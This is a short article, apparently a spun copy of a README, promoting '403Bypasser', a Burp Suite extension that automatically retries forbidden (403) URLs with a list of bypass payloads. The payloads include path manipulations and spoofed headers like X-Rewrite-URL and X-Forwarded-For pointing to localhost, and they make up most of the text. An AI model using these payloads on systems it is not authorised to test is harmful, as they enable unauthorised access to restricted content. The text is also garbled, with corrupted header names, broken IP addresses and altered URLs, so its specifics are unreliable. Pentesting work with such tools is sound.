403Bypasser – Burpsuite Extension To Bypass 403 Restricted Directory

An burpsuite extension to bypass 403 restricted directory. By working with PassiveScan (default enabled), each and every 403 ask for will be automatically scanned by this extension, so just incorporate to burpsuite and get pleasure from.

Payloads: $1: HOSTNAME $2: Path

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2something -H "X-First-URL: /$2" 
$1/$2 -H "X-Tailor made-IP-Authorization: 127...1" 
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127...1"
$1/$2 -H "X-Forwarded-For: 127...1"
$1/$2 -H "X-Remote-IP: 127...1"
$1/$2 -H "X-Consumer-IP: 127...1"
$1/$2 -H "X-Host: 127...1"
$1/$2 -H "X-Forwared-Host: 127...1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2../

Thanks @lohubi for contributing several payloads.

Set up

BurpSuite -> Extender -> Extensions -> Insert -> Extension Form: Python -> Decide on file: 403bypasser.py -> Up coming until Finish

References:

• https://twitter.com/iam_j0ker/status/1324354024657711106?s=20
• https://twitter.com/jae_hak99/status/1297556269960540161?s=20
• https://twitter.com/SalahHasoneh1/standing/1296572143141031945
• https://twitter.com/lobuhisec/position/1329705441883017218

Impression and Short article Source website link

Read through Much more on Pentesting Applications